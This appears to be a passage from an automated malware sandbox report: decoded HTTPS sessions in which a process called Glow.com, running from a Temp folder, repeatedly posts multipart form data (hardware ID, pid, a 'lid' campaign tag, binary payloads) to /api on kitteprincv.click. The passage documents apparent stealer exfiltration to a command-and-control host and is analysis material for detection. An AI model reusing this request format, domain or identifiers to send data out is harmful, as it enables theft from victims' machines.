                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1663&rtt_var=703&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2842&recv_bytes=951&delivery_rate=1474747&cwnd=231&unsent_bytes=0&cid=72d80b1769b5b937&ts=782&x=0"
                                                                                                                                                                        2024-12-21 12:02:10 UTC238INData Raw: 63 34 62 0d 0a 61 34 6a 43 72 5a 41 65 74 38 6b 6f 66 5a 66 5a 64 6a 31 36 41 35 6d 5a 69 4f 56 45 41 44 35 75 48 4f 44 52 66 74 6f 7a 61 77 30 51 71 72 53 50 71 69 71 62 36 31 73 59 74 65 4d 43 54 77 39 6d 74 62 76 70 67 57 59 36 57 41 39 77 6b 37 52 53 2b 45 55 47 4c 31 48 75 6f 38 48 6a 65 35 76 72 54 51 57 31 34 79 31 47 57 47 62 33 75 37 4c 48 49 57 70 63 44 33 43 43 73 42 57 31 51 77 64 75 41 2b 53 6c 78 66 56 39 30 36 68 45 45 50 4b 38 45 31 77 51 62 66 44 30 34 49 68 6d 4c 42 77 4c 5a 73 4c 72 58 4a 64 57 48 32 77 6d 36 62 48 47 73 6d 4f 62 73 67 6f 59 2b 66 74 4d 48 78 74 6d 2b 2f 58 75 67 53 39 6f 56 67 5a 34 67 37 55 55 71 6c 6f 4e 5a 51 50 71 70 73 54 2f 64 4d 65 6c 54 68 66 35 75 68 6c 63 57
                                                                                                                                                                        Data Ascii: c4ba4jCrZAet8kofZfZdj16A5mZiOVEAD5uHODRftozaw0QqrSPqiqb61sYteMCTw9mtbvpgWY6WA9wk7RS+EUGL1Huo8Hje5vrTQW14y1GWGb3u7LHIWpcD3CCsBW1QwduA+SlxfV906hEEPK8E1wQbfD04IhmLBwLZsLrXJdWH2wm6bHGsmObsgoY+ftMHxtm+/XugS9oVgZ4g7UUqloNZQPqpsT/dMelThf5uhlcW
                                                                                                                                                                        2024-12-21 12:02:10 UTC1369INData Raw: 43 2b 37 2f 50 4c 48 66 69 49 50 50 6e 32 54 6f 67 6d 31 51 51 38 76 46 71 53 35 6a 2f 56 77 6c 66 4d 4b 46 2f 6d 31 45 56 77 58 5a 76 72 37 2b 49 67 6d 59 56 51 45 65 6f 69 38 45 37 64 66 41 32 67 42 34 36 66 41 39 58 54 54 70 45 6c 66 75 2f 73 54 52 31 67 35 75 39 76 36 68 43 56 32 55 52 30 2b 6e 66 30 46 2b 46 59 46 4c 31 47 71 70 73 48 7a 63 64 57 35 51 68 54 2b 76 67 5a 55 45 57 7a 32 2b 2b 65 4e 4b 57 46 63 43 33 53 49 76 42 61 38 58 41 52 70 43 65 72 67 67 62 4a 37 7a 65 73 53 58 39 61 2b 42 46 67 55 64 37 6e 42 71 70 68 6f 65 78 77 4c 63 73 4c 72 58 4c 42 55 43 6d 77 43 35 61 50 48 2b 57 37 56 75 55 77 53 38 4b 6b 53 57 68 5a 72 2b 4f 6e 67 69 53 42 68 56 51 64 33 68 37 51 59 2b 42 39 4a 61 42 47 71 2b 49 2f 54 63 64 36 6e 51 41 6a 31 2b 77 73 52
                                                                                                                                                                        Data Ascii: C+7/PLHfiIPPn2Togm1QQ8vFqS5j/VwlfMKF/m1EVwXZvr7+IgmYVQEeoi8E7dfA2gB46fA9XTTpElfu/sTR1g5u9v6hCV2UR0+nf0F+FYFL1GqpsHzcdW5QhT+vgZUEWz2++eNKWFcC3SIvBa8XARpCerggbJ7zesSX9a+BFgUd7nBqphoexwLcsLrXLBUCmwC5aPH+W7VuUwS8KkSWhZr+OngiSBhVQd3h7QY+B9JaBGq+I/Tcd6nQAj1+wsR
                                                                                                                                                                        2024-12-21 12:02:10 UTC1369INData Raw: 6e 6d 6a 53 42 74 55 51 41 2b 7a 50 4d 62 6f 42 46 52 4c 79 50 70 74 4d 7a 34 50 75 43 6f 52 42 48 79 72 56 52 41 56 6e 69 37 2f 4f 62 48 66 69 4a 52 44 58 61 45 6f 52 4f 31 55 67 64 68 42 75 2b 76 78 2f 4a 38 32 4b 35 4f 46 50 36 34 47 56 73 4b 61 2f 76 7a 37 34 59 73 61 42 78 43 50 6f 57 72 58 4f 41 52 4f 48 67 43 71 4a 58 4d 2f 48 4c 53 76 51 6f 41 75 36 4a 55 57 42 51 68 6f 37 76 6e 6a 79 4e 6e 55 77 31 30 6a 4c 59 57 74 46 6b 48 62 42 76 6c 70 4d 2f 2b 64 4e 2b 6d 52 42 76 39 73 68 39 55 48 6d 48 36 38 61 72 4a 5a 6d 56 45 54 43 62 43 68 78 75 30 58 41 59 74 50 4f 6d 75 77 66 56 71 6c 62 51 45 42 72 57 38 47 42 39 41 49 66 66 79 36 6f 77 73 5a 6c 77 4c 63 34 65 77 47 37 74 63 44 6d 55 48 37 61 54 44 2b 33 48 54 71 30 30 62 38 4b 6b 52 56 68 52 74 75
                                                                                                                                                                        Data Ascii: nmjSBtUQA+zPMboBFRLyPptMz4PuCoRBHyrVRAVni7/ObHfiJRDXaEoRO1UgdhBu+vx/J82K5OFP64GVsKa/vz74YsaBxCPoWrXOAROHgCqJXM/HLSvQoAu6JUWBQho7vnjyNnUw10jLYWtFkHbBvlpM/+dN+mRBv9sh9UHmH68arJZmVETCbChxu0XAYtPOmuwfVqlbQEBrW8GB9AIffy6owsZlwLc4ewG7tcDmUH7aTD+3HTq00b8KkRVhRtu
                                                                                                                                                                        2024-12-21 12:02:10 UTC178INData Raw: 6d 66 52 49 56 50 6f 57 2f 58 4f 41 52 41 47 59 62 35 4b 37 47 2f 33 72 64 72 45 51 53 2f 72 30 66 57 42 39 6e 39 76 50 6e 67 69 56 6a 57 41 5a 73 67 62 67 57 74 56 74 4a 49 55 6e 74 75 49 2b 71 50 50 4b 6e 59 77 2f 75 71 51 49 66 42 79 2f 69 75 2b 32 4c 5a 6a 6f 63 44 33 47 4c 76 42 53 77 58 67 5a 72 42 2b 79 6d 77 76 64 7a 33 37 6c 43 45 66 69 77 47 31 51 4b 59 66 62 2f 35 6f 4d 75 61 56 5a 4d 4d 4d 4b 30 42 50 67 4a 53 56 6f 45 35 61 44 4d 35 44 7a 4b 35 56 4e 66 38 72 64 55 42 31 68 74 39 66 76 6c 69 79 70 70 56 41 31 0d 0a
                                                                                                                                                                        Data Ascii: mfRIVPoW/XOARAGYb5K7G/3rdrEQS/r0fWB9n9vPngiVjWAZsgbgWtVtJIUntuI+qPPKnYw/uqQIfBy/iu+2LZjocD3GLvBSwXgZrB+ymwvdz37lCEfiwG1QKYfb/5oMuaVZMMMK0BPgJSVoE5aDM5DzK5VNf8rdUB1ht9fvliyppVA1
                                                                                                                                                                        2024-12-21 12:02:10 UTC1369INData Raw: 33 63 64 31 0d 0a 79 6a 4c 51 5a 73 56 6b 42 66 51 6a 75 71 4d 37 38 63 39 53 76 54 78 72 78 76 42 42 5a 46 79 47 31 75 2b 32 66 5a 6a 6f 63 49 31 6d 33 38 54 32 43 45 52 59 68 45 4b 71 6e 77 37 49 6b 6c 61 64 4a 45 2f 32 30 45 6c 59 55 61 2f 4c 77 35 6f 77 69 62 6c 55 4a 65 49 4f 32 47 62 6c 56 42 57 55 50 36 61 50 41 2f 58 50 64 36 77 52 66 38 71 4e 55 42 31 68 45 37 50 44 6b 67 57 5a 39 45 68 55 2b 68 62 39 63 34 42 45 46 5a 67 2f 73 70 63 50 7a 65 74 32 75 51 68 76 30 76 52 4a 63 46 32 58 2b 2b 75 57 44 4b 6d 78 57 44 58 2b 4f 75 42 4f 7a 56 45 6b 68 53 65 32 34 6a 36 6f 38 35 4b 68 63 43 4f 57 33 56 45 42 57 65 4c 76 38 35 73 64 2b 49 6c 30 65 64 49 69 39 47 62 64 55 43 6d 41 4f 35 36 62 44 2b 48 58 64 72 55 55 57 35 37 67 59 55 52 39 76 39 2f 58 6e
                                                                                                                                                                        Data Ascii: 3cd1yjLQZsVkBfQjuqM78c9SvTxrxvBBZFyG1u+2fZjocI1m38T2CERYhEKqnw7IkladJE/20ElYUa/Lw5owiblUJeIO2GblVBWUP6aPA/XPd6wRf8qNUB1hE7PDkgWZ9EhU+hb9c4BEFZg/spcPzet2uQhv0vRJcF2X++uWDKmxWDX+OuBOzVEkhSe24j6o85KhcCOW3VEBWeLv85sd+Il0edIi9GbdUCmAO56bD+HXdrUUW57gYUR9v9/Xn
                                                                                                                                                                        2024-12-21 12:02:10 UTC1369INData Raw: 73 46 64 5a 43 35 47 37 39 61 41 57 51 47 37 4c 4c 44 2f 47 37 51 75 56 68 66 75 2f 73 54 52 31 67 35 75 38 33 74 6c 7a 5a 68 48 6a 31 6f 67 61 55 58 74 56 31 4a 63 45 66 7a 34 4d 6a 2b 50 49 33 72 54 42 44 38 75 42 74 65 45 57 33 32 2f 75 4f 43 4a 32 52 59 42 6e 53 43 74 52 71 35 56 41 4e 73 43 4f 43 70 79 50 70 37 31 72 6b 4b 55 62 57 38 44 42 39 41 49 64 4c 38 2b 49 6b 32 49 6b 4e 43 5a 38 4b 30 45 50 67 4a 53 57 73 44 35 61 54 49 2f 6e 72 51 72 55 63 65 2b 72 6f 55 55 42 78 71 38 76 33 72 69 69 4e 76 57 42 35 30 69 62 77 51 73 56 30 45 4c 30 65 71 70 39 65 79 4a 4a 57 61 52 78 48 37 76 41 49 66 42 79 2f 69 75 2b 32 4c 5a 6a 6f 63 44 58 4b 4e 73 42 4f 37 55 67 68 6c 47 2f 69 73 78 76 70 35 32 61 42 45 47 65 65 39 47 31 59 62 59 76 4c 38 34 6f 73 73 59
                                                                                                                                                                        Data Ascii: sFdZC5G79aAWQG7LLD/G7QuVhfu/sTR1g5u83tlzZhHj1ogaUXtV1JcEfz4Mj+PI3rTBD8uBteEW32/uOCJ2RYBnSCtRq5VANsCOCpyPp71rkKUbW8DB9AIdL8+Ik2IkNCZ8K0EPgJSWsD5aTI/nrQrUce+roUUBxq8v3riiNvWB50ibwQsV0EL0eqp9eyJJWaRxH7vAIfBy/iu+2LZjocDXKNsBO7UghlG/isxvp52aBEGee9G1YbYvL84ossY
                                                                                                                                                                        2024-12-21 12:02:10 UTC1369INData Raw: 43 36 77 71 6f 52 67 35 77 52 2f 50 67 79 50 34 38 6a 65 74 4d 46 76 4f 38 45 6c 45 4b 5a 50 33 30 35 59 34 76 5a 6c 51 50 66 6f 61 33 47 37 31 53 42 57 51 4f 36 61 2f 4c 2b 33 4c 63 70 41 70 52 74 62 77 4d 48 30 41 68 32 75 44 70 69 79 73 69 51 30 4a 6e 77 72 51 51 2b 41 6c 4a 59 77 66 76 6f 4d 58 30 65 4e 43 74 51 42 72 31 73 42 64 51 48 47 66 2f 39 4f 71 4d 4c 32 4e 61 43 58 53 4a 74 52 47 37 56 77 38 76 52 36 71 6e 31 37 49 6b 6c 59 74 52 45 76 6d 38 56 45 42 57 65 4c 76 38 35 73 64 2b 49 6c 63 41 65 6f 57 7a 45 62 74 5a 44 47 73 44 37 36 44 48 34 48 54 56 72 46 67 4e 39 62 49 52 55 78 74 68 2f 2f 33 6a 67 53 56 6d 48 45 49 2b 68 61 74 63 34 42 45 6b 59 77 37 44 70 39 53 79 59 35 75 79 43 68 6a 35 2b 30 77 66 47 57 72 78 39 4f 65 45 49 47 46 58 43 58
                                                                                                                                                                        Data Ascii: C6wqoRg5wR/PgyP48jetMFvO8ElEKZP305Y4vZlQPfoa3G71SBWQO6a/L+3LcpApRtbwMH0Ah2uDpiysiQ0JnwrQQ+AlJYwfvoMX0eNCtQBr1sBdQHGf/9OqML2NaCXSJtRG7Vw8vR6qn17IklYtREvm8VEBWeLv85sd+IlcAeoWzEbtZDGsD76DH4HTVrFgN9bIRUxth//3jgSVmHEI+hatc4BEkYw7Dp9SyY5uyChj5+0wfGWrx9OeEIGFXCX
                                                                                                                                                                        2024-12-21 12:02:10 UTC1369INData Raw: 2b 45 64 4a 4e 31 75 6b 34 4e 32 79 4a 4a 58 73 53 51 33 6e 76 52 64 4a 47 79 62 46 78 63 32 52 4c 47 56 4d 43 32 6d 4e 38 31 4c 34 58 6b 6b 33 4d 4b 71 70 79 4f 6c 74 77 36 5a 61 47 4c 57 45 57 68 38 41 49 61 4f 37 33 34 51 6f 62 46 73 61 62 38 2b 55 43 72 4a 57 47 57 67 65 35 65 43 42 73 6e 71 56 38 78 6c 52 74 62 38 46 48 30 41 78 71 61 43 2f 31 48 45 79 44 68 4d 77 6d 2f 4d 4b 2b 41 6c 62 49 55 6e 34 34 4a 65 79 4f 39 61 35 57 42 6e 32 72 52 63 59 4a 6c 2f 63 34 65 65 42 4d 58 4e 69 4d 6e 6d 59 76 68 71 76 51 45 56 36 43 75 53 75 79 4f 51 38 6d 2b 74 46 58 36 32 43 56 42 64 59 58 72 57 37 38 73 64 2b 49 6d 6b 50 63 49 79 30 43 71 6b 63 4c 6e 55 45 37 4c 66 65 73 6a 4b 56 72 51 70 48 70 66 56 55 57 77 6b 68 6f 36 75 34 33 48 4d 78 43 31 77 73 6e 66 30
                                                                                                                                                                        Data Ascii: +EdJN1uk4N2yJJXsSQ3nvRdJGybFxc2RLGVMC2mN81L4Xkk3MKqpyOltw6ZaGLWEWh8AIaO734QobFsab8+UCrJWGWge5eCBsnqV8xlRtb8FH0AxqaC/1HEyDhMwm/MK+AlbIUn44JeyO9a5WBn2rRcYJl/c4eeBMXNiMnmYvhqvQEV6CuSuyOQ8m+tFX62CVBdYXrW78sd+ImkPcIy0CqkcLnUE7LfesjKVrQpHpfVUWwkho6u43HMxC1wsnf0
                                                                                                                                                                        2024-12-21 12:02:10 UTC1369INData Raw: 6d 45 48 37 62 62 65 73 6a 4b 56 70 41 70 48 7a 50 74 63 48 79 63 76 75 2b 4f 71 33 32 5a 58 58 77 4a 77 68 61 55 4e 39 58 59 48 61 41 6a 38 73 4e 6a 39 50 4a 76 72 54 46 2b 74 36 56 6f 66 48 48 43 37 6f 37 72 56 66 54 63 50 57 79 37 51 72 46 4b 68 45 52 38 76 55 62 6a 75 6a 2b 41 38 6a 65 73 4e 48 4f 65 70 45 6c 77 4f 59 72 7a 46 31 4b 41 6f 5a 56 30 61 62 70 57 38 55 35 5a 6e 4b 46 45 33 2f 36 50 42 2f 48 76 44 75 67 70 52 74 62 52 55 42 79 45 68 73 37 76 56 79 57 5a 36 48 46 51 2b 74 37 41 53 74 6c 59 66 66 6b 54 4e 72 73 6a 7a 61 73 57 38 52 56 44 62 6a 54 55 66 56 69 48 39 75 37 4c 56 61 43 4a 59 48 54 37 61 34 30 37 6a 42 46 6f 34 57 62 69 2f 67 65 73 38 77 2b 73 53 54 62 76 37 42 68 39 41 49 62 7a 34 2b 4a 55 67 59 55 6f 50 4f 62 79 4e 4f 37 5a 57
                                                                                                                                                                        Data Ascii: mEH7bbesjKVpApHzPtcHycvu+Oq32ZXXwJwhaUN9XYHaAj8sNj9PJvrTF+t6VofHHC7o7rVfTcPWy7QrFKhER8vUbjuj+A8jesNHOepElwOYrzF1KAoZV0abpW8U5ZnKFE3/6PB/HvDugpRtbRUByEhs7vVyWZ6HFQ+t7AStlYffkTNrsjzasW8RVDbjTUfViH9u7LVaCJYHT7a407jBFo4Wbi/ges8w+sSTbv7Bh9AIbz4+JUgYUoPObyNO7ZW


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        2192.168.2.449740104.21.43.1274437576C:\Users\user\AppData\Local\Temp\600044\Glow.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-21 12:02:11 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=OCX7VZAWZQ7KITFAT1
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 18166
                                                                                                                                                                        Host: kitteprincv.click
                                                                                                                                                                        2024-12-21 12:02:11 UTC15331OUTData Raw: 2d 2d 4f 43 58 37 56 5a 41 57 5a 51 37 4b 49 54 46 41 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 31 42 36 32 38 39 31 43 43 39 39 42 41 31 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 4f 43 58 37 56 5a 41 57 5a 51 37 4b 49 54 46 41 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 43 58 37 56 5a 41 57 5a 51 37 4b 49 54 46 41 54 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c
                                                                                                                                                                        Data Ascii: --OCX7VZAWZQ7KITFAT1Content-Disposition: form-data; name="hwid"7B1B62891CC99BA11145237798DF8CC2--OCX7VZAWZQ7KITFAT1Content-Disposition: form-data; name="pid"2--OCX7VZAWZQ7KITFAT1Content-Disposition: form-data; name="lid"MeHdy4--pl3cl
                                                                                                                                                                        2024-12-21 12:02:11 UTC2835OUTData Raw: 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf
                                                                                                                                                                        Data Ascii: @xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe
                                                                                                                                                                        2024-12-21 12:02:13 UTC1144INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 21 Dec 2024 12:02:12 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=vndtanf3qrof39uq8v5686eqpt; expires=Wed, 16 Apr 2025 05:48:51 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BopaxbFpQ566z8YCTiEY1fAxeyn9qEwqqwwQK%2BgcvMv9szNyFq5k5Ml3JF0vSeJGo3YXwzMRsNUo6gqnjCSal%2BK0k5r7s%2FrUEQ1tT%2FrY%2B6bxJ5yh8%2BydIDE0%2BdrhHqV0p0WnVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f57b8c8fb36c47a-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1615&rtt_var=625&sent=13&recv=23&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19129&delivery_rate=1725768&cwnd=244&unsent_bytes=0&cid=cdd26f77434fbb17&ts=1224&x=0"
                                                                                                                                                                        2024-12-21 12:02:13 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                        2024-12-21 12:02:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        3192.168.2.449741104.21.43.1274437576C:\Users\user\AppData\Local\Temp\600044\Glow.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-21 12:02:14 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=3OQHAZ4VL
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 8733
                                                                                                                                                                        Host: kitteprincv.click
                                                                                                                                                                        2024-12-21 12:02:14 UTC8733OUTData Raw: 2d 2d 33 4f 51 48 41 5a 34 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 31 42 36 32 38 39 31 43 43 39 39 42 41 31 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 33 4f 51 48 41 5a 34 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 4f 51 48 41 5a 34 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c 65 61 72 0d 0a 2d 2d 33 4f 51 48 41 5a 34 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                        Data Ascii: --3OQHAZ4VLContent-Disposition: form-data; name="hwid"7B1B62891CC99BA11145237798DF8CC2--3OQHAZ4VLContent-Disposition: form-data; name="pid"2--3OQHAZ4VLContent-Disposition: form-data; name="lid"MeHdy4--pl3clear--3OQHAZ4VLContent-D
                                                                                                                                                                        2024-12-21 12:02:15 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 21 Dec 2024 12:02:14 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                        Connection: close
                                                                                                                                                                        Set-Cookie: PHPSESSID=rqe9nn8s98f0nam0gjsm6pvp7f; expires=Wed, 16 Apr 2025 05:48:53 GMT; Max-Age=9999999; path=/
                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LUOOeRo%2Bnlz%2FH0FpdkrqpYd%2BYmMM1tlXtGH1ZjOKh26Y3IMwzAY1HgoaP3ndv9Fc16Ls1Laer13kj2ZwMX18KK0J6uQaxsAH9nDQJg0PgA1uK0MbX7pvEd0%2Bkjmca7Vei0Z2wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                        CF-RAY: 8f57b8d8c9eb8c2f-EWR
                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1780&min_rtt=1770&rtt_var=685&sent=9&recv=14&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9664&delivery_rate=1573275&cwnd=228&unsent_bytes=0&cid=515c4c563d4251c2&ts=796&x=0"
                                                                                                                                                                        2024-12-21 12:02:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                                                                                        2024-12-21 12:02:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                        4192.168.2.449743104.21.43.1274437576C:\Users\user\AppData\Local\Temp\600044\Glow.com
                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                        2024-12-21 12:02:16 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                        Content-Type: multipart/form-data; boundary=V7Y3TEP1KG1PO
                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                        Content-Length: 20410
                                                                                                                                                                        Host: kitteprincv.click
                                                                                                                                                                        2024-12-21 12:02:16 UTC15331OUTData Raw: 2d 2d 56 37 59 33 54 45 50 31 4b 47 31 50 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 42 31 42 36 32 38 39 31 43 43 39 39 42 41 31 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 0d 0a 2d 2d 56 37 59 33 54 45 50 31 4b 47 31 50 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 56 37 59 33 54 45 50 31 4b 47 31 50 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c 65 61 72 0d 0a 2d 2d 56 37 59 33 54 45 50 31
                                                                                                                                                                        Data Ascii: --V7Y3TEP1KG1POContent-Disposition: form-data; name="hwid"7B1B62891CC99BA11145237798DF8CC2--V7Y3TEP1KG1POContent-Disposition: form-data; name="pid"3--V7Y3TEP1KG1POContent-Disposition: form-data; name="lid"MeHdy4--pl3clear--V7Y3TEP1
                                                                                                                                                                        2024-12-21 12:02:16 UTC5079OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                        Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                        2024-12-21 12:02:17 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                        Date: Sat, 21 Dec 2024 12:02:17 GMT
                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
